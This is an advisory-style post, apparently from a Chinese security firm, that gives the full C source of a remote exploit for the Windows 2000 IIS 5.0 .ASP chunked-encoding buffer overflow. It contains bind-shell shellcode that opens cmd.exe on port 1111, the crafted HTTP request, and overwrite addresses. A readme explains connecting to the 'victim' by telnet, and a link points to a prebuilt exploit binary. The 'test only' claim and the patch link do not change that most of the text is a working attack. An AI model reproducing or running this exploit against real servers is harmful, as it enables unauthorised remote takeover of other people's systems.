Windows 2000 Server IIS 5.0 .ASP Overflow Exploit

Summary:

========

The following code will allow you to safely test your

system for the below motioned vulnerability. For more

information about this vulnerability see

http://www.eeye.com/html/press/PR20020410.html previous

article:"windows 2000 and NT4 IIS .ASP Buffer Overflow".

The following code comes from CHINANSL TECHNOLOGY CO.,LTD.

For more information about our company see

http://www.chinansl.com.

Exploit:

========

--------------------CUT HERE--------------------------------

/*

Windows 2000 Server Exploit By CHINANSL Security Team.

Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.

Warning:THIS PROGRAM WILL ONLY TEST.

CHINANSL Technology CO.,LTD

http://www.chinansl.com

[email protected]

*/

#include "stdafx.h"

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <windows.h>

#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])

{

    if(argc != 4)

    {

            printf("%s ip port aspfilepath\n\n",argv

[0]);

            printf("        ie. %s 127.0.0.1 

80 /iisstart.asp\n",argv[0]);

            puts("  programed by [email protected]");



            return 0;

    }



    DWORD srcdata=0x01e2fb1c-4;//0x00457474;        

            //address of SHELLCODE

    DWORD 

jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6

\x01";///"\x0c\xfb\xe6\x01";

    char* destIP=argv[1];

    char* destFile=argv[3];

    int webport=atoi(argv[2]);

    char* pad="\xcc\xcc\xcc\xcc"  "ADPA"  "\x02\x02\x02

\x02" "PADP"; //16 bytes

    WSADATA ws;

    SOCKET  s;

    long result=0;

    if(WSAStartup(0x0101,&ws) != 0)

    {

            puts("WSAStartup() error");

            return -1;

    }



    struct  sockaddr_in addr;

    addr.sin_family=AF_INET;

    addr.sin_port=htons(webport);

    addr.sin_addr.s_addr=inet_addr(destIP);

    s=socket(AF_INET,SOCK_STREAM,0);

    if(s==-1)

    {

            puts("Socket create error");

            return -1;

    }

    

    if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) 

== -1)

    {

            puts("Cannot connect to the specified 

host");

            return -1;

    }



    char buff[4096];

char* shellcode=

"\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33

\xc9\x89"

"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65

\x6c\x33\x32"

"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32

\x2e\xab"

"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32

\xc0\x4f"

"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53

\xff\xd0\x89"

"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53

\xff\xd0"

"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75

\xfc\xff\xd3\x89"

"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6

\x66\xbe"

"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66

\xbe\x3e\x02\x56"

"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56

\xff\x75\xfc"

"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75

\xfc\xff\xd3\x89"

"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75

\xfc\xff\xd3\x89"

"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75

\xfc\xff\xd3\x89"

"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45

\xe0\x6a"

"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8

\xff\xd3"

"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3

\x89\x45"

"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13

\xff\x75\xf8"

"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45

\xc8\x6a"

"\x03\xff\x75\xf8\xff\xd3\x89\x85

\x1c\xff\xff\xff\x8d\x7d\xa0\x32"

"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0

\xab\xf7\xd0"

"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8

\xab\x33\xc0"

"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50

\xff\x55"

"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4

\x6a\x10"

"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75

\xc4\xff"

"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45

\xc0\x33"

"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50

\xff\x55"

"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45

\x94\x50"

"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44

\x32\xc0"

"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01

\x89\x47"

"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89

\x47\x3c"

"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85

\x38\xff"

"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51

\x53\xff"

"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34

\xff\xff\xff\x89"

"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85

\x2c\xff\xff\xff\x50"

"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85

\x2c\xff\xff\xff\x85"

"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85

\x2c\xff\xff\xff\x50\x53"

"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0

\x74\x6d"

"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30

\xff\xff\xff\xff"

"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90

\x90\x90"

"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90

\x33\xc0"

"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0

\xff\x55\xc8"

"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50

\x8d\x85"

"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30

\xff\xff"

"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4

\xff\x75\xc4"

"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95

\x1c\xff\xff\xff\x6a"

"\xff\xff\x95\x18\xff\xff\xff";

            char* s1="POST ";// HTTP/1.1\r\n";

            char* s2="Accept: */*\r\n";

            char* s4="Content-Type: application/x-www-

form-urlencoded\r\n";

            char* s5="Transfer-Encoding: 

chunked\r\n\r\n";

            char* sc="0\r\n\r\n\r\n";



            char shellcodebuff[1024*8];

            memset(shellcodebuff,0x90,sizeof

(shellcodebuff));

            memcpy(&shellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1],shellcode,strlen(shellcode));

            shellcodebuff[sizeof(shellcodebuff)-1] = 0;





    char sendbuff[1024*16];

    memset(sendbuff,0,1024*16);



    sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %

s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%

s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j

mpaddr*/,sc);

    int sendlen=strlen(sendbuff);

*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;

    *(DWORD *)strstr(sendbuff,"AAAA") = srcdata;



    result=send(s,sendbuff,sendlen,0);

    if(result == -1 )

    {

            puts("Send shellcode error!");

            return -1;

    }



    memset(buff,0,4096);

    result=recv(s,buff,sizeof(buff),0);



    if(strstr(buff,"<html>") != NULL)

    {

            shutdown(s,0);

            closesocket(s);



            puts("Send shellcode error!Try again!");

            return -1;

    }

    



    shutdown(s,0);

    closesocket(s);

    printf("\nUse <telnet %s 1111> to connect to the 

host\n",destIP);

    puts("If you cannot connect to the host,try run 

this program again!");

return 0;

}

---------------------------End------------------------------

Readme:

=======

This .asp overflow exploit will open port 1111 and bind 

the cmd.exe.One thing should be noted is that everytime you

run this exploit and a message will show that this exploit

works perfectly,but that doesn't mean you can get the

access to the target host,the reason is that on some

occasions there will be a message-box appear on victim's

terminal screen showing that an AV(Accesee Violation) has

occured.anyhow,this dialog should be closed by recipient

otherwise you can not gaining the access even if you

continue your attack.

Download:

=========

http://download.chinansl.com/aspexploit.exe

Solution:

=========

patch:http://www.microsoft.com/Downloads/Release.asp?

ReleaseID=37824

Reference:

==========

Copyright 2001-2002 CHINANSL. All Rights Reserved.

This Information comes from CHINANSL TECHNOLOGY

CO.,LTD. It can be transshipped. But please guarantee the

completion of the article, otherwise we will pursue the

rights of the law.

www.chinansl.com

[email protected]